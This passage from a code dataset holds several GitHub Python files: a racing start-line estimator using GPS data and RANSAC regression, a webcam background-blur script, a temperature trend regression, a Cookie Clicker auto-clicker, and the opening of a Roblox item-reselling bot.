races, these coordinates can be overlayed on top of each other\nand a robust linear regression algorithm can quite accurately fit the\nexact location of the starting stalls.\n\nnote that this only works for flat races where a starting stall is used.\nfor jumps racing, an approach would have to simply find the timestamp\nand coordinates at which the P field begins to decrease for each runner.\n\n@author: George Swindells\n\"\"\"\n\nimport os\nimport json\nimport dateutil\nfrom datetime import datetime, timedelta\nimport numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import RANSACRegressor\n\nfrom ..feeds.utils import (\n compute_bearing,\n compute_mean_bearing,\n compute_new_coords,\n reduce_racetype,\n put_datetime\n )\nfrom ..feeds.postrace_feeds import GmaxFeed\nfrom .. 
import get_logger\nlogger = get_logger(name = __name__)\n\n\nos.environ[\"STARTLINE_COORDS_DIRECTORY\"] = (\n os.environ.get(\"STARTLINE_COORDS_DIRECTORY\")\n or os.path.join(os.environ[\"LOGS_DIR\"], \"startline_coords\")\n )\n\nif not os.path.exists(os.environ[\"STARTLINE_COORDS_DIRECTORY\"]):\n os.mkdir(os.environ[\"STARTLINE_COORDS_DIRECTORY\"])\n\n\ndef save_start_line(data: dict,\n race_type: str,\n directory: str = os.environ.get(\"STARTLINE_COORDS_DIRECTORY\")\n ) -> None:\n \"\"\"\n save a startline dictionary into the filesystem under the race type label\n which should be reduced.\n\n Parameters\n ----------\n data : dict\n dict of the startline coords\n race_type : str\n gmax race type label, reduced using reduce_racetype (checked).\n directory : str, optional\n directory into which to save the data.\n The default is os.environ.get(\"STARTLINE_COORDS_DIRECTORY\").\n \"\"\"\n race_type = reduce_racetype(race_type).lower().replace(\"/\", \"_\")\n path = os.path.join(directory, race_type + \".json\")\n with open(path, \"w\") as f:\n json.dump(data, f)\n\n\ndef load_start_line(race_type: str,\n directory: str = os.environ.get(\"STARTLINE_COORDS_DIRECTORY\")\n ) -> dict or None:\n \"\"\"\n load start line from the local start line coords directory\n\n Parameters\n ----------\n race_type : str\n gmax RaceType to load from the start line coords directory\n directory : str, optional\n directory from which to load the start line coords.\n The default is os.environ.get(\"STARTLINE_COORDS_DIRECTORY\")\n \"\"\"\n race_type = reduce_racetype(race_type).lower().replace(\"/\", \"_\")\n path = os.path.join(directory, race_type + \".json\")\n start_line = None\n if os.path.exists(path):\n with open(path, \"r\") as f:\n start_line = json.load(f)\n return start_line\n\n\ndef create_start_lines(gmax_feed: GmaxFeed,\n lower_date: datetime = datetime(2018,1,1),\n upper_date: datetime = datetime.today(),\n race_types: list = None,\n racecourses: list = None,\n offline: bool = True,\n off_times: dict = {},\n sample_size: int = 50\n ) -> dict:\n \"\"\"\n for the given daterange and specific race types/courses, compute\n new start line geometry from the post race GPS points and save them\n into the start line directory in environment variable STARTLINE_COORDS_DIRECTORY.\n\n Parameters\n ----------\n gmax_feed : GmaxFeed,\n GmaxFeed instance to use to fetch the racelist and the points\n from the local or remote sources.\n lower_date : datetime, optional\n lower date boundary for racelist query.\n The default is datetime(2018,1,1).\n upper_date : datetime, optional\n upper date boundary for racelist query.\n The default is datetime.today()\n race_types : list, optional\n list of specific race types to recreate.\n The default is None, and all race types are recreated.\n racecourses : list, optional\n list of specific racecourse to recreate.\n The default is None, and all records are recreated.\n offline : bool, optional\n parameter for GmaxFeed instance, if True no requests are sent to\n the Gmax APIs and only the local file system cache is used.\n The default is True.\n off_times : dict, optional\n dictionary of known off times for each race, as dict of sharecode\n to a datetime object of naive UTC.\n If given, this can be used to identify the starting stall GPS\n points instead of estimating the start point from the minimum\n velocities, and may be more accurate.\n The default is {}\n \"\"\"\n racelist = gmax_feed.get_racelist_range(\n start_date = lower_date,\n end_date = upper_date,\n offline = 
offline\n )\n # apply further filter conditions\n if racecourses:\n racecourses = set(racecourses)\n racelist = {\n sc: v for sc, v in racelist.items()\n if v[\"Racecourse\"] in racecourses\n }\n # group sharecodes into race types, and apply filter conditions\n race_type_groups = {\n reduce_racetype(row[\"RaceType\"]).lower(): []\n for row in racelist.values() if row[\"Published\"]\n }\n if race_types:\n race_types = set([reduce_racetype(rt).lower() for rt in race_types])\n race_type_groups = {\n k: v for k, v in race_type_groups.items()\n if k in race_types\n }\n for row in racelist.values():\n rt = reduce_racetype(row[\"RaceType\"]).lower()\n if rt in race_type_groups and row[\"Published\"]:\n race_type_groups[rt].append(row[\"I\"])\n # for each race type, fetch the points data (or a good sample size of it)\n for race_type, sharecodes in race_type_groups.items():\n # possible for some flat races to be flag start when stalls are broken,\n # but it's so rare that it should get buried by the stalls data\n is_jumps = any([\n x in race_type\n for x in [\"chase\", \"hurdle\", \"nh_flat\", \"nhflat\", \"nh flat\"]\n ])\n if len(sharecodes) > sample_size:\n sharecodes = np.random.choice(\n sharecodes,\n size = sample_size,\n replace = False\n )\n sharecodes = sharecodes.tolist()\n points = gmax_feed.get_data(\n sharecodes = sharecodes,\n request = {\"points\"},\n offline = offline\n ).get(\"points\")\n # find timestamp at which all runners are in the starting stalls.\n # for jumps races, due to the run-up, the logic will work a bit\n # differently, ensure the LOBF is parallel to the direction of\n # travel by taking subsequent timestamp around the point at which P\n # begins to decrease, then take the negative reciprocal of the gradient\n # which gives the gradient of the perpendicular line.\n # apply this to the average point at which P begins to decrease and\n # use that as the result.\n if is_jumps:\n all_coordinates = pd.DataFrame()\n all_bearings = []\n for sc, sc_points in points.items():\n if not sc_points:\n continue\n # find the timestamp at which runner P fields begin to decrease\n # and take runner coordinates at t-1 and t+1 to sample the init\n # bearing for each race, then cache the coords near the start line.\n # take negative reciprocal of the mean bearing for startline bearing\n # and use with average x,y to create a polynomial to go into the record.\n df = pd.DataFrame.from_records(sc_points)\n runners = list(set([row[\"I\"] for row in sc_points]))\n max_p = df.P.max()\n df2 = df[df.P < max_p]\n runner_start_timestamps = df2[[\"I\", \"T\"]].groupby(\"I\").min()\n runner_start_timestamps.loc[\n runner_start_timestamps.index,\n \"T\"\n ] = runner_start_timestamps[\"T\"].apply(\n dateutil.parser.parse\n )\n ts1 = [\n put_datetime(x)\n for x in\n (runner_start_timestamps - timedelta(seconds = 1))[\"T\"].to_list()\n ]\n ts2 = [\n put_datetime(x)\n for x in\n (runner_start_timestamps + timedelta(seconds = 1))[\"T\"].to_list()\n ]\n df3 = df.set_index([\"I\", \"T\"])\n for t1, t2, runner_sc in zip(ts1, ts2, runner_start_timestamps.index):\n try:\n init_coords = df3.loc[(runner_sc, t1), [\"X\", \"Y\"]]\n final_coords = df3.loc[(runner_sc, t2), [\"X\", \"Y\"]]\n except Exception:\n logger.exception(\n \"Error occurred accessing runner_sc timestamp for coords: {0}\".format(\n (runner_sc, t1, t2)\n )\n )\n continue\n b = compute_bearing(\n coords1 = (init_coords[\"X\"], init_coords[\"Y\"]),\n coords2 = (final_coords[\"X\"], final_coords[\"Y\"])\n )\n x = np.mean([init_coords[\"X\"], 
final_coords[\"X\"]])\n y = np.mean([init_coords[\"Y\"], final_coords[\"Y\"]])\n all_bearings.append(b)\n all_coordinates = pd.concat(\n (all_coordinates, pd.DataFrame({\"X\": [x], \"Y\": [y]}))\n )\n if all_bearings:\n all_bearings = np.array(all_bearings)\n mean_bearing = compute_mean_bearing(\n all_bearings[np.isfinite(all_bearings)]\n )\n if np.isnan(mean_bearing):\n continue\n perpendicular_bearing = mean_bearing + (np.pi/2)\n xy1 = (\n np.mean(all_coordinates.X),\n np.mean(all_coordinates.Y)\n )\n xy2 = compute_new_coords(\n X1 = xy1[0],\n Y1 = xy1[1],\n D = 5,\n B = perpendicular_bearing\n )\n xy3 = compute_new_coords(\n X1 = xy1[0],\n Y1 = xy1[1],\n D = -5,\n B = perpendicular_bearing\n )\n # fit linear regressor to get gradient and intercept\n poly = np.polyfit(\n x = [xy1[0], xy2[0], xy3[0]],\n y = [xy1[1], xy2[1], xy3[1]],\n deg = 1\n )\n start_line_coords = {\n \"poly\": [\n poly[0],\n poly[1]\n ],\n \"xy1\": list(xy2),\n \"xy2\": list(xy3)\n }\n # save the startline coords for this racetype in the filesystem\n save_start_line(\n data = start_line_coords, \n race_type = race_type\n )\n else:\n continue\n else:\n all_coordinates = pd.DataFrame()\n for sc, sc_points in points.items():\n if not sc_points:\n continue\n # identify timestamp in the stalls and extract coords\n start_distance = max([row[\"P\"] for row in sc_points]) - 2.\n timestamp_boundary = min([\n dateutil.parser.parse(row[\"T\"]) for row in sc_points\n ]) + timedelta(seconds = 30)\n runners = list(set([\n row[\"I\"] for row in sc_points\n if row[\"P\"] > start_distance\n and dateutil.parser.parse(row[\"T\"]) < timestamp_boundary\n and row[\"V\"] < 2.\n ]))\n start_timestamp = off_times.get(sc)\n if not start_timestamp:\n df = pd.DataFrame.from_records(sc_points)\n df = df[\n (df.P > start_distance) & (df.V < 2.)\n ]\n if len(df) == 0:\n continue\n runner_count = df[[\"T\", \"I\"]].groupby(\"T\").count().reset_index()\n valid_timestamps = runner_count[runner_count.I == len(runners)][\"T\"]\n tempdf = df.loc[\n df[\"T\"].isin(valid_timestamps),\n [\"T\", \"V\"]\n ]\n tempdf = tempdf.assign(\n V2 = np.power(tempdf.V, 2)\n )\n if len(tempdf) == 0:\n continue\n sum_sq_v = tempdf.groupby(\"T\").sum()\n min_sum_sq_v = sum_sq_v[sum_sq_v[\"V2\"] == sum_sq_v[\"V2\"].min()]\n if min_sum_sq_v.index.empty:\n continue\n start_timestamp = min_sum_sq_v.index[0]\n else:\n start_timestamp -= timedelta(seconds = 1.5)\n start_timestamp = (\n start_timestamp - timedelta(\n microseconds = start_timestamp.microsecond\n )\n )\n start_timestamp = put_datetime(start_timestamp)\n start_coords = df.loc[\n df[\"T\"] == start_timestamp,\n [\"T\", \"X\", \"Y\"]\n ]\n all_coordinates = pd.concat((all_coordinates, start_coords))\n if all_coordinates.empty:\n logger.info(\"all_coordinates dataframe is empty: {0}\".format(race_type))\n continue\n # once all coords have been extracted, find average X and Y.\n av_x = all_coordinates.X.mean()\n av_y = all_coordinates.Y.mean()\n # translate each race onto the average X and Y for the racetype, to\n # eliminate small placement errors in the starting stall location\n group_differences_x = (\n all_coordinates[[\"T\", \"X\"]].groupby(\"T\").mean() - av_x\n ).reset_index()\n group_differences_y = (\n all_coordinates[[\"T\", \"Y\"]].groupby(\"T\").mean() - av_y\n ).reset_index()\n \n tempdf_x = group_differences_x.merge(\n all_coordinates[[\"T\", \"X\"]],\n on = \"T\",\n suffixes = (\"_left\", \"_right\")\n )\n translated_x = tempdf_x[\"X_right\"] - tempdf_x[\"X_left\"]\n \n tempdf_y = 
group_differences_y.merge(\n all_coordinates[[\"T\", \"Y\"]],\n on = \"T\",\n suffixes = (\"_left\", \"_right\")\n )\n translated_y = tempdf_y[\"Y_right\"] - tempdf_y[\"Y_left\"]\n # fit the initial LOBF on the translated data\n x = translated_x.to_numpy().reshape(-1, 1)\n y = translated_y.to_numpy().reshape(-1, 1)\n poly_rls = RANSACRegressor()\n poly_rls.fit(x, y)\n start_line_coords = {\n \"poly\": [\n poly_rls.estimator_.coef_[0][0],\n poly_rls.estimator_.intercept_[0]\n ],\n \"xy1\": None,\n \"xy2\": None\n }\n poly = np.poly1d(start_line_coords[\"poly\"])\n observations = len(x)\n lower_x = np.sort(x)[int(observations * 0.2)]\n upper_x = np.sort(x)[int(observations * 0.8)]\n start_line_coords[\"xy1\"] = [float(lower_x), float(poly(np.min(lower_x)))]\n start_line_coords[\"xy2\"] = [float(upper_x), float(poly(np.max(upper_x)))]\n # save the startline coords for this racetype in the filesystem\n save_start_line(\n data = start_line_coords, \n race_type = race_type\n )\n","repo_name":"TotalPerformanceData/gmaxfeed","sub_path":"gmaxfeed/derivatives/start_line.py","file_name":"start_line.py","file_ext":"py","file_size_in_byte":16652,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"74099630332","text":"import cv2\nimport mediapipe as mp\nimport numpy as np\n\nmp_selfie = mp.solutions.selfie_segmentation\nmodel = mp_selfie.SelfieSegmentation()\n\ncap = cv2.VideoCapture(0)\nwhile cap.isOpened():\n ret, frame = cap.read()\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n res = model.process(frame)\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n mask = np.stack((res.segmentation_mask,) * 3, axis=-1) > 0.5\n segmented_image = np.where(mask, frame, cv2.blur(frame, (40, 40)))\n\n cv2.imshow(\"blur\", segmented_image)\n\n if cv2.waitKey(10) & 0xFF is 27:\n break\ncap.release()\ncv2.destroyAllWindows()","repo_name":"vinal-gadhiya/mediapipe_projects","sub_path":"selfie_segmentation.py","file_name":"selfie_segmentation.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32539334192","text":"import pandas as pd\n\nnyc_average_yearly = pd.read_csv(\"ave_yearly_temp_nyc_1895-2017.csv\")\nnyc_january = pd.read_csv(\"ave_hi_nyc_jan_1895-2018.csv\")\n\n# Floor the Date values for the average yearly temp\nnyc_average_yearly.Date = nyc_average_yearly.Date.floordiv(100)\n\n# Split the dataset into training and test data for the january and yearly average temperaturs\nfrom sklearn.model_selection import train_test_split\n\n# Average Yearly\nX_train, X_test, y_train, y_test = train_test_split(\n nyc_average_yearly.Date.values.reshape(-1, 1),\n nyc_average_yearly.Value.values,\n random_state=11,\n)\n\n# January Average\nX_jan_train, X_jan_test, y_jan_train, y_jan_test = train_test_split(\n nyc_january.Date.values.reshape(-1, 1),\n nyc_january.Temperature.values,\n random_state=11,\n)\n\n\n# Run the linear regression\nfrom sklearn.linear_model import LinearRegression\n\nlinear_regression = LinearRegression()\nlinear_regression_jan = LinearRegression()\n\n# the fit method epects the samples and the targets for training\nlinear_regression.fit(X=X_train, y=y_train)\nlinear_regression_jan.fit(X=X_jan_train, y=y_jan_train)\n\npredicted = linear_regression.predict(X_test)\nexpected = y_test\n\npredicted_jan = linear_regression_jan.predict(X_jan_test)\nexpected_jan = y_jan_test\n\n\n# lambda implements y=mx+b\npredict = lambda x: 
linear_regression.coef_ * x + linear_regression.intercept_\npredict_jan = (\n lambda x: linear_regression_jan.coef_ * x + linear_regression_jan.intercept_\n)\n\n# Visualize the two scatter plots\nimport matplotlib.pyplot as plt\n\nfig, ax = plt.subplots(2, figsize=(10, 6))\n\nfig.suptitle(\n \"1895-2018: Comparing Average Yearly Temperature and Average Temperature in January\",\n fontsize=14,\n)\n\nax[0].scatter(\n x=nyc_average_yearly[\"Date\"], y=nyc_average_yearly[\"Value\"], c=\"darkgreen\"\n)\nax[0].set_xlabel(\"Year\")\nax[0].set_ylabel(\"Average Yearly Temperature\")\nax[0].set_ylim(10, 70)\n\nax[1].scatter(x=nyc_january[\"Date\"], y=nyc_january[\"Temperature\"], c=\"darkgreen\")\nax[1].set_xlabel(\"Year\")\nax[1].set_ylabel(\"Average January Temperature\")\n\nplt.ylim(10, 70)\n\n# Add the trend lines\nimport numpy as np\n\nx = np.array([min(nyc_average_yearly.Date.values), max(nyc_average_yearly.Date.values)])\ny = predict(x)\n\nx_jan = np.array([min(nyc_january.Date.values), max(nyc_january.Date.values)])\ny_jan = predict_jan(x_jan)\n\nline = ax[0].plot(x, y, c=\"mediumseagreen\", linewidth=2)\nline2 = ax[1].plot(x_jan, y_jan, c=\"mediumseagreen\", linewidth=2)\n\nplt.show()\n","repo_name":"boluwaji11/ML-Exercise","sub_path":"temp_comparison.py","file_name":"temp_comparison.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37944001549","text":"from selenium import webdriver\r\nimport time\r\n\r\ndriver_chrome = 'devSelenium\\chromedriver.exe'\r\nurl_cookie = 'https://orteil.dashnet.org/cookieclicker/'\r\n\r\n\r\ndriver = webdriver.Chrome(executable_path=driver_chrome)\r\n\r\ndriver.get(url=url_cookie)\r\n\r\n# drivers\r\nclick_cookie = driver.find_element_by_id('bigCookie')\r\ncookies = driver.find_element_by_xpath('//*[@id=\"cookies\"]')\r\n\r\n\r\n\r\n\r\ndef get_cookies():\r\n cokies_number = cookies.text.split('\\n')\r\n cokies_number = cokies_number[0].split(' ')\r\n cokies_number = cokies_number[0]\r\n return cokies_number[0]\r\n\r\n\r\ndef buy_upgrade():\r\n upgrades = driver.find_elements_by_id('upgrades')\r\n for upg in upgrades:\r\n upg.click()\r\n\r\ndef buy_products():\r\n produtcs=driver.find_elements_by_id('products')\r\n for prod in produtcs:\r\n prod.click()\r\n\r\n\r\ncookies_number = 0\r\nk = 100\r\nwhile(True):\r\n click_cookie.click()\r\n if(k==0):\r\n buy_upgrade()\r\n buy_products()\r\n k=100\r\n k -=1\r\n\r\ndriver.quit()\r\n","repo_name":"rubensilva091/Python","sub_path":"100DaysPython Course/2.Intermediate 15-58/d48 Selenium/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43459537067","text":"try:\n import requests, os, sys, json, time, threading, copy\n from colorama import Fore, Style\n from rgbprint import gradient_print\nexcept ModuleNotFoundError as error:\n os.system(\"pip install requests colorama rgbprint\")\n os.execv(sys.executable, [sys.executable] + [sys.argv[0]] + sys.argv[1:])\n\nsettings = json.load(open(\"settings.json\", \"r\"))\ncollectable_types = [\n 8,\n 42,\n 43,\n 44,\n 45,\n 46,\n 47,\n 41,\n 64,\n 65,\n 68,\n 67,\n 66,\n 69,\n 72,\n 70,\n 71\n]\nsell_methods = [\n \"CUSTOM\",\n \"UNDERCUT\",\n \"MEWTVALUES\"\n]\n\nclass MewtStyle():\n MAIN = f\"\\x1b[38;2;247;184;207m\"\n\n\nclass Webhook:\n def __init__(self, webhook):\n self.webhook = webhook\n\n def post(self, buyer_name, buyer_id, item_name, 
item_id, item_thumbnail, price):\n payload = {\n \"embeds\": [\n {\n \"title\": f\"Sold {item_name}!\",\n \"description\": f\"`earned`: **{price}**\\n`buyer`: **[{buyer_name}](https://www.roblox.com/users/{buyer_id})**\",\n \"url\": f\"https://www.roblox.com/catalog/{item_id}\",\n \"color\": 16234703,\n \"thumbnail\": {\n \"url\": item_thumbnail\n }\n }\n ]\n }\n \n with requests.session() as session:\n session.post(self.webhook, json=payload)\n\nclass Client:\n def __init__(self):\n self.version = \"1.0.1\"\n self.title = (f\"\"\"\n d8, \n d8P `8P \n d888888P \n 88bd8b,d88b d8888b ?88 d8P d8P ?88' ?88, 88P d88 d888b8b ?88 d8P d888b8b \n 88P'`?8P'?8bd8b_,dP d88 d8P' d8P' 88P `?8bd8P' ?88 d8P' ?88 d88 d8P'd8P' ?88 \n d88 d88 88P88b ?8b ,88b ,88' 88b d8P?8b, 88b 88b ,88b ?8b ,88' 88b ,88b \nd88' d88' 88b`?888P' `?888P'888P' `?8b d8P' `?8b `88b`?88P'`88b`?888P' `?88P'`88b\n )88 \n ,88P \n `?888P\n \n discord.gg/mewt & discord.gg/javaw - v{self.version} \n \"\"\")\n\n self.ready = False \n self.sell_method = settings[\"SELL_METHOD\"]\n self.custom_values = settings[\"CUSTOM_VALUES\"]\n self.mewtvalue_multiplier = settings[\"MEWTVALUE_MULTIPLIER\"]\n self.whitelist = settings[\"WHITELIST\"]\n self.blacklist = settings[\"BLACKLIST\"]\n self.webhook_enabled = settings[\"WEBHOOK\"][\"ENABLED\"]\n self.webhook_url = settings[\"WEBHOOK\"][\"URL\"]\n self.client = {\n \"cookie\": settings[\"COOKIE\"],\n \"auth\": \"abcabcabc\",\n \"name\": \"abcabcabc\",\n \"id\": 0\n }\n self.inventory = {}\n self.last_transaction_id = None\n self.raw_inventory = []\n self.onsale = []\n self.mewt_collection = []\n self.mewt_collection_reversed = []\n \n\n self.id_to_name = {}\n self.collectable_id_to_name = {}\n\n self.collectable_instance_id_to_product_id = {}\n\n self.collectable_id_to_id = {}\n\n self.webhook = None\n\n self.session = requests.session()\n self.session.cookies['.ROBLOSECURITY'] = self.client[\"cookie\"]\n\n self.resellable_count = 0\n self.logs = []\n\n if self.webhook_enabled:\n self.webhook = Webhook(self.webhook_url)\n\n if(self.sell_method not in sell_methods):\n print(\"Invalid sell method, accepted sale here are the accepted sell methods; \" + \", \".join([value for value in sell_methods]))\n time.sleep(1)\n raise SystemExit\n \n if(self.sell_method == \"MEWTVALUES\" and self.mewtvalue_multiplier < 1):\n print(\"Your mewt value multiplier is less than 1, it needs to be above one or you will loose robux\")\n time.sleep(1)\n raise SystemExit\n \n if(self.sell_method == \"CUSTOM\" and len(self.custom_values) <= 0):\n print(\"You need add custom values to support your sell method\")\n time.sleep(1)\n raise SystemExit\n\n\n self.verify_cookie()\n while self.ready != True:\n time.sleep(1)\n\n \n self.infinite_thread(self.update_status, 1)\n self.infinite_thread(self.set_token, 200)\n self.infinite_thread(self.fetch_mewt_collection, 10 * 60)\n\n self.logs.append(f\"Logged in as {self.client['name']}({self.client['id']})\")\n self.logs.append(\"Fetching inventory this may take a minute, please wait.\")\n self.infinite_thread(self.update_inventory, 15 * 60)\n self.infinite_thread(self.sell_all_items, 5)\n self.infinite_thread(self.scan_recent_transactions, 3 * 60)\n\n def update_status(self):\n os.system('cls' if os.name=='nt' else 'clear')\n gradient_print(self.title, start_color=(0xFF6EA3), end_color=(0xF7B8CF))\n print(Fore.RESET + Style.RESET_ALL)\n print(Style.BRIGHT + f\"> Current User: {MewtStyle.MAIN}{Style.BRIGHT}{self.client['name']}{Fore.WHITE}{Style.BRIGHT} \")\n print(Style.BRIGHT + f\"> 
Resellable Items: {MewtStyle.MAIN}{Style.BRIGHT}{self.resellable_count}{Fore.WHITE}{Style.BRIGHT} \")\n print(Style.BRIGHT + f\"> Sell Method: {MewtStyle.MAIN}{Style.BRIGHT}{self.sell_method}{Fore.WHITE}{Style.BRIGHT} \")\n print()\n print(Style.BRIGHT + f\"> Logs: {MewtStyle.MAIN}{Style.BRIGHT}\\n\" + \"\\n\".join(log for log in self.logs[-10:]) + f\"{Fore.WHITE}{Style.BRIGHT}\")\n\n def fetch_mewt_collection(self):\n conn = requests.get(\"https://mewt.manlambo13.repl.co/collectables\")\n if(conn.status_code == 200):\n data = conn.json()\n self.mewt_collection = { item[\"id\"]: item for item in data }\n self.mewt_collection_reversed = { item[\"collectibleItemId\"]: item for item in data }\n self.logs.append(\"Successfully fetched mewt collectable database\")\n else:\n time.sleep(5)\n return self.fetch_mewt_collection()\n \n def find_mewtdata_by_id(self, id):\n if len(self.mewt_collection) <= 0:\n time.sleep(1)\n return self.find_mewtdata_by_id(id)\n \n if id in self.mewt_collection:\n return self.mewt_collection[id]\n else:\n return None\n \n def find_mewtdata_by_collectable_item_id(self, collectibleItemId):\n if len(self.mewt_collection_reversed) <= 0:\n time.sleep(1)\n return self.find_mewtdata_by_id(collectibleItemId)\n \n if collectibleItemId in self.mewt_collection_reversed:\n return self.mewt_collection_reversed[collectibleItemId]\n else:\n return None\n\n def verify_cookie(self):\n conn = self.session.get(\"https://users.roblox.com/v1/users/authenticated\")\n if(conn.status_code == 200):\n data = conn.json()\n self.client[\"id\"] = data[\"id\"]\n self.client[\"name\"] = data[\"name\"]\n self.ready = True\n else:\n print(\"Invalid cookie or please wait a minute and trying again\")\n time.sleep(1)\n raise SystemExit\n \n def set_token(self):\n try:\n conn = self.session.post(\"https://friends.roblox.com/v1/users/1/request-friendship\")\n if(conn.headers.get(\"x-csrf-token\")):\n self.client[\"auth\"] = conn.headers[\"x-csrf-token\"]\n self.session.headers[\"x-csrf-token\"] = conn.headers[\"x-csrf-token\"]\n except:\n time.sleep(5)\n return self.set_token()\n\n def scan_recent_transactions(self):\n try:\n conn = self.session.get(f\"https://economy.roblox.com/v2/users/{self.client['id']}/transactions?cursor=&limit=100&transactionType=Sale\")\n if(conn.status_code == 200):\n conn_data = conn.json()\n data = conn_data[\"data\"]\n if self.last_transaction_id is None:\n self.last_transaction_id = data[0][\"idHash\"]\n return \n \n for sale in data:\n if sale[\"idHash\"] == self.last_transaction_id:\n self.last_transaction_id = data[0][\"idHash\"] \n break \n \n agentId = sale['agent']['id']\n agentName = sale['agent']['name']\n assetId = sale['details']['id']\n assetName = sale['details']['name']\n assetType = sale['details']['type']\n amount = sale['currency']['amount']\n if assetType != 'Asset':\n continue\n\n mewt_data = self.find_mewtdata_by_id(int(assetId))\n \n if not mewt_data:\n continue\n\n self.logs.append(f\"{agentName} bought {assetName}, you earned {amount}!\")\n if self.webhook_enabled:\n self.webhook.post(agentName, agentId, assetName, assetId, mewt_data[\"thumbnail\"], amount)\n else:\n time.sleep(5)\n return self.scan_recent_transactions()\n\n except Exception as error:\n print(error)\n time.sleep(5)\n return self.scan_recent_transactions()\n\n def fetch_inventory(self, assettype, cursor = \"\", data = []):\n try:\n conn = self.session.get(f\"https://inventory.roblox.com/v2/users/{self.client['id']}/inventory/{assettype}?cursor={cursor}&limit=100&sortOrder=Desc\")\n 
if(conn.status_code == 200):\n conn_data = conn.json()\n data = data + conn_data[\"data\"]\n\n if conn_data[\"nextPageCursor\"] is not None:\n return self.fetch_inventory(assettype, conn_data[\"nextPageCursor\"], data)\n \n return data\n elif(conn.status_code == 429):\n time.sleep(5)\n return self.fetch_inventory(assettype, cursor, data)\n except:\n time.sleep(5)\n return self.fetch_inventory(assettype, cursor, data)\n\n \n def fetch_item_resellable(self, collectableItemId, cursor = \"\", data = []):\n try:\n conn = self.session.get(f\"https://apis.roblox.com/marketplace-sales/v1/item/{collectableItemId}/resellable-instances?cursor={cursor}&ownerType=User&ownerId={self.client['id']}&limit=500\")\n if(conn.status_code == 200):\n conn_data = conn.json()\n data = data + conn_data[\"itemInstances\"]\n if conn_data[\"nextPageCursor\"] is not None:\n return self.fetch_item_resellable(collectableItemId, conn_data[\"nextPageCursor\"], data)\n \n return data\n else:\n time.sleep(10)\n return self.fetch_item_resellable(collectableItemId, cursor, data)\n except:\n time.sleep(5)\n return self.fetch_item_resellable(collectableItemId, cursor, data)\n \n def fetch_item_details(self, items):\n try:\n conn = self.session.post(\"https://apis.roblox.com/marketplace-items/v1/items/details\", json={ \"itemIds\": items })\n if(conn.status_code == 200):\n conn_data = conn.json()\n return conn_data\n else:\n time.sleep(5)\n return self.fetch_item_details(items)\n except:\n time.sleep(5)\n return self.fetch_item_details(items)\n \n def fetch_reseller(self, collectableItemId):\n try:\n conn = self.session.get(f\"https://apis.roblox.com/marketplace-sales/v1/item/{collectableItemId}/resellers?limit=1\")\n if(conn.status_code == 200):\n conn_data = conn.json()\n return conn_data[\"data\"][0]\n else:\n time.sleep(5)\n return self.fetch_reseller(collectableItemId)\n except:\n time.sleep(5)\n return self.fetch_reseller(collectableItemId)\n\n def fetch_item_details_chunks(self, items):\n chunks = []\n data = []\n collectable_items = []\n\n for item in items:\n mewt_data = self.find_mewtdata_by_id(int(item))\n if mewt_data:\n collectable_items.append(mewt_data[\"collectibleItemId\"])\n\n while len(collectable_items) > 0:\n chunks.append(collectable_items[:120])\n collectable_items = collectable_items[120:]\n\n for chunk in chunks:\n new_data = self.fetch_item_details(chunk)\n data = data + new_data\n\n return data\n \n def sell_item(self, price, collectibleItemId, collectibleInstanceId, collectibleProductId):\n try:\n payload = {\n \"collectibleProductId\": collectibleProductId,\n \"isOnSale\": True,\n \"price\": price,\n \"sellerId\": self.client[\"id\"],\n \"sellerType\": \"User\",\n }\n conn = self.session.patch(f\"https://apis.roblox.com/marketplace-sales/v1/item/{collectibleItemId}/instance/{collectibleInstanceId}/resale\", json=payload)\n if(conn.status_code == 200):\n return True\n else:\n time.sleep(10)\n return self.sell_item(price, collectibleItemId, collectibleInstanceId, collectibleProductId)\n except:\n time.sleep(10)\n return self.sell_item(price, collectibleItemId, collectibleInstanceId, collectibleProductId)\n \n def sell_all_items(self):\n if(len(self.inventory) > 0):\n try:\n inventory = copy.deepcopy(self.inventory)\n price_cache = {}\n \n for collectibleItemId, collectibleInstanceIds in inventory.items():\n for collectibleInstanceId in collectibleInstanceIds:\n if collectibleInstanceId in self.onsale:\n if collectibleInstanceId in self.inventory[collectibleItemId]:\n 
self.inventory[collectibleItemId].remove(collectibleInstanceId)\n continue\n\n price = None\n\n if self.sell_method == \"CUSTOM\":\n id = str(self.collectable_id_to_id[collectibleItemId])\n if not id in self.custom_values:\n self.logs.append(f\"Failed to sell {self.collectable_id_to_name[collectibleItemId]} due to no custom value for the item.\")\n self.resellable_count -= 1\n else:\n price = self.custom_values[id]\n elif self.sell_method == \"MEWTVALUES\":\n mewt_data = self.find_mewtdata_by_collectable_item_id(collectibleItemId)\n if mewt_data[\"estimatedValue\"] <= 0:\n self.logs.append(f\"Failed to sell {self.collectable_id_to_name[collectibleItemId]} due mewt value being too low\")\n self.resellable_count -= 1\n else:\n price = mewt_data[\"estimatedValue\"] * self.mewtvalue_multiplier\n elif self.sell_method == \"UNDERCUT\":\n if collectibleItemId not in price_cache:\n recent_seller = self.fetch_reseller(collectibleItemId)\n if recent_seller[\"seller\"][\"sellerId\"] == self.client[\"id\"]:\n price_cache[collectibleItemId] = recent_seller[\"price\"]\n else:\n price_cache[collectibleItemId] = (recent_seller[\"price\"] - 1)\n\n price = price_cache[collectibleItemId]\n \n if price is not None:\n success = self.sell_item(price, collectibleItemId, collectibleInstanceId, self.collectable_instance_id_to_product_id[collectibleInstanceId])\n if success == True:\n self.logs.append(f\"Successfully put {self.collectable_id_to_name[collectibleItemId]} on sale for {price}\")\n self.onsale.append(collectibleInstanceId)\n self.resellable_count -= 1\n except Exception as error:\n print(error)\n\n\n def update_inventory(self):\n self.resellable_count = 0\n self.inventory = {}\n can_resell_collectables = []\n\n if len(self.whitelist) > 0:\n item_details = self.fetch_item_details_chunks(self.whitelist)\n for item in item_details:\n mewt_data = self.find_mewtdata_by_id(item[\"itemTargetId\"])\n if(mewt_data 